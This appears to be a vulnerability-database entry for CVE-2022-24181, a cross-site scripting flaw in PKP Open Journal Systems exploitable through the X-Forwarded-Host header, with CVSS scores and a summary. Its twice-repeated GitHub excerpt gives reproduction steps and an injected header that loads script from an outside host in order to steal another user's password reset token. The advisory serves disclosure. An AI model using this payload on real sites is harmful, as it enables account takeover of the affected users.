6.1
CVSSv3

CVE-2022-24181

Published: 01/04/2022 Updated: 08/04/2022
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
CVSS v3 Base Score: 6.1 | Impact Score: 2.7 | Exploitability Score: 2.8
VMScore: 384
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

Vulnerability Summary

Cross-site scripting (XSS) via Host Header injection in PKP Open Journals System 2.4.8 >= 3.3 allows remote malicious users to inject arbitary code via the X-Forwarded-Host Header.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

public knowledge project open journal systems

Exploits

PKP Open Journals System version 33 suffers from a cross site scripting vulnerability ...

Github Repositories

XSS via Host Header injection and Steal Password Reset Token of another user

CVE-2022-24181 Open-journal-system-Vulnerability XSS via Host Header injection and Steal Password Reset Token of another user Step to reproduce: Go to this site: who's-using-ojs-softwarecom And capture this request in burp , and send to repeater Add this after Host Header X-Forwarded-Host: foo"><script src=//dtfpw/2js></scrip

XSS via Host Header injection and Steal Password Reset Token of another user

CVE-2022-24181 Open-journal-system-Vulnerability XSS via Host Header injection and Steal Password Reset Token of another user Step to reproduce: Go to this site: who's-using-ojs-softwarecom And capture this request in burp , and send to repeater Add this after Host Header X-Forwarded-Host: foo"><script src=//dtfpw/2js></scrip